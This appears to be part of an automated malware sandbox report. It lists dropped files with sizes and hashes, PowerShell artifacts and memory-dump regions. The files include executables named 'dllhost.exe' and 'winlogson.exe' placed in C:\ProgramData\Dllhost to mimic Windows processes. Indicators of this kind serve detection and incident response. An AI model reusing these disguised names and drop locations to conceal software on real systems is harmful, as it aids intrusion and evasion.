78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\config.json

Filesize
319B

MD5
c5f8798ae874128f672a5530896be6c8

SHA1
af8ea8134104bd02b44e9ba22cd0aec237274803

SHA256
9f39bae97cbc0a943def6b6b954a57c45e938648b506a3b9196684cdbbb53a78

SHA512
7f01c1aab052614e921974ccfcfacdc15afac8a0660cb89790233480eb9e64a0f0aa6fd3495e20708e54569456a83b8b70716e49fbb20d15d3227c11502f32fa

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
761fee773ec1e1eb396eddddeb321865

SHA1
f969e9da9e90a5aef00730b8e1c3763ba2ac46c5

SHA256
82273f8e42cee630011c8e931351186391c4ca9e126e5921db275564e1ef7fbb

SHA512
3f648b7c88b1e0195acad5ad194b59f5de8f2bf9179b2cc330d7ef1a028d48141541545b2354137a2ab0105e92fb75d9e0e11c9250ee1bcb7a4f472de3637a5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
92ac806751a5c2426906969dd7ac271b

SHA1
dbf117fec714e44ea46f080fc243796039bd9b28

SHA256
3a2658bdcdc07ee580d9833caa71707dfe08797a666ecd71acba03da1f74bb98

SHA512
887596b06c2e8908cd72bcc24762013e9b4f05421be9b85a8af0cbd2771cc6a4a9a1509b77ab03d563a6e11ee02eacbbd6acbd7c62853ef7fdccb7e245bfd37b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
88798a77118023519275fcaeae5b3fb7

SHA1
ed2738d13ddfe103c78b9118a6bfeb12642698ff

SHA256
7ff1e1ff96ada56791a7b0f6c96685c173d93b5eb915c5f72750f7fda4942f5b

SHA512
ea3d2d76690999227ca6686c11a6667a1fa174e217bccc1b1c532709b1bdb427e773fb3edcc7c1f7ba371f3c075fd31238a34f777f929a0e46edb277ba4daaaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
88798a77118023519275fcaeae5b3fb7

SHA1
ed2738d13ddfe103c78b9118a6bfeb12642698ff

SHA256
7ff1e1ff96ada56791a7b0f6c96685c173d93b5eb915c5f72750f7fda4942f5b

SHA512
ea3d2d76690999227ca6686c11a6667a1fa174e217bccc1b1c532709b1bdb427e773fb3edcc7c1f7ba371f3c075fd31238a34f777f929a0e46edb277ba4daaaa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
274e697937ae91081dad2aec15c81b24

SHA1
6ee4f52b89e6c0ddaf984fe37a92b8c8b32380fc

SHA256
849ba4cfaa89925a58476ffab786d2f9544bba91cbec36b559975f5ccb5beda8

SHA512
213adf10aeca3b5e46be02467ebe54bec25ae930de3051bb792ce51fc8032023091d438f0fa67abd1618dc152653db1ccc9dc33015948fdf0eede3cbd465a839

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
274e697937ae91081dad2aec15c81b24

SHA1
6ee4f52b89e6c0ddaf984fe37a92b8c8b32380fc

SHA256
849ba4cfaa89925a58476ffab786d2f9544bba91cbec36b559975f5ccb5beda8

SHA512
213adf10aeca3b5e46be02467ebe54bec25ae930de3051bb792ce51fc8032023091d438f0fa67abd1618dc152653db1ccc9dc33015948fdf0eede3cbd465a839

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ayrgbvhv.m3t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1240-332-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-336-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-329-0x0000000001150000-0x0000000001170000-memory.dmp

Filesize
128KB

Download
memory/1240-328-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-327-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-326-0x0000000001110000-0x0000000001150000-memory.dmp

Filesize
256KB

Download
memory/1240-331-0x0000000001150000-0x0000000001170000-memory.dmp

Filesize
128KB

Download
memory/1240-324-0x00000000001C0000-0x00000000001E0000-memory.dmp

Filesize
128KB

Download
memory/1240-330-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-335-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-333-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1240-334-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/1588-197-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/1588-251-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/1588-283-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/1588-196-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/1588-305-0x000000007F640000-0x000000007F650000-memory.dmp

Filesize
64KB

Download
memory/2220-318-0x0000000007C10000-0x0000000007C20000-memory.dmp

Filesize
64KB

Download
memory/2220-195-0x0000000007C10000-0x0000000007C20000-memory.dmp

Filesize
64KB

Download
memory/2220-192-0x0000000000F10000-0x0000000000F26000-memory.dmp

Filesize
88KB

Download
memory/2788-141-0x00000000076D0000-0x00000000076DA000-memory.dmp

Filesize
40KB

Download
memory/2788-138-0x0000000007C60000-0x0000000008204000-memory.dmp

Filesize
5.6MB

Download
memory/2788-187-0x0000000007AD0000-0x0000000007AE0000-memory.dmp

Filesize
64KB

Download
memory/2788-133-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/2788-142-0x0000000007860000-0x00000000078C6000-memory.dmp

Filesize
408KB

Download
memory/2788-140-0x0000000007AD0000-0x0000000007AE0000-memory.dmp

Filesize
64KB

Download
memory/2788-139-0x0000000007750000-0x00000000077E2000-memory.dmp

Filesize
584KB

Download
memory/2792-210-0x0000000004510000-0x0000000004520000-memory.dmp

Filesize
64KB

Download
memory/2792-204-0x0000000004510000-0x0000000004520000-memory.dmp

Filesize
64KB

Download
memory/2792-281-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3040-231-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/3040-221-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/3040-306-0x000000007F1B0000-0x000000007F1C0000-memory.dmp

Filesize
64KB

Download
memory/3040-271-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3040-294-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/3476-308-0x000000007FA50000-0x000000007FA60000-memory.dmp

Filesize
64KB

Download
memory/3476-293-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3476-304-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/3476-215-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/3476-220-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/3536-292-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3536-252-0x0000000074E90000-0x0000000074EDC000-memory.dmp

Filesize
304KB

Download
memory/3536-198-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/3536-307-0x000000007F120000-0x000000007F130000-memory.dmp

Filesize
64KB

Download
memory/4300-175-0x0000000007910000-0x000000000791A000-memory.dmp

Filesize
40KB

Download
memory/4300-170-0x0000000006B50000-0x0000000006B6E000-memory.dmp

Filesize
120KB

Download
memory/4300-180-0x0000000007AE0000-0x0000000007AEE000-memory.dmp

Filesize
56KB

Download
memory/4300-176-0x0000000007B30000-0x0000000007BC6000-memory.dmp

Filesize
600KB

Download
memory/4300-182-0x0000000007B20000-0x0000000007B28000-memory.dmp

Filesize
32KB

Download
memory/4300-174-0x00000000078A0000-0x00000000078BA000-memory.dmp

Filesize
104KB

Download
memory/4300-173-0x0000000007EE0000-0x000000000855A000-memory.dmp

Filesize
6.5MB

Download
memory/4300-172-0x000000007F8E0000-0x000000007F8F0000-memory.dmp

Filesize
64KB

Download
memory/4300-171-0x0000000003080000-0x0000000003090000-memory.dmp

Filesize
64KB

Download
memory/4300-181-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

Filesize
104KB

Download
memory/4300-160-0x0000000074C90000-0x0000000074CDC000-memory.dmp

Filesize
304KB

Download
memory/4300-159-0x0000000006B70000-0x0000000006BA2000-memory.dmp

Filesize
200KB

Download
memory/4300-158-0x00000000065B0000-0x00000000065CE000-memory.dmp

Filesize
120KB

Download
memory/4300-157-0x0000000003080000-0x0000000003090000-memory.dmp

Filesize
64KB

Download
memory/4300-156-0x0000000003080000-0x0000000003090000-memory.dmp

Filesize
64KB

Download
memory/4300-146-0x0000000005E50000-0x0000000005EB6000-memory.dmp

Filesize
408KB

Download
memory/4300-145-0x0000000005660000-0x0000000005682000-memory.dmp

Filesize
136KB

Download
memory/4300-144-0x00000000056F0000-0x0000000005D18000-memory.dmp

Filesize
6.2MB

Download
memory/4300-143-0x0000000002F30000-0x0000000002F66000-memory.dmp

Filesize
216KB

Download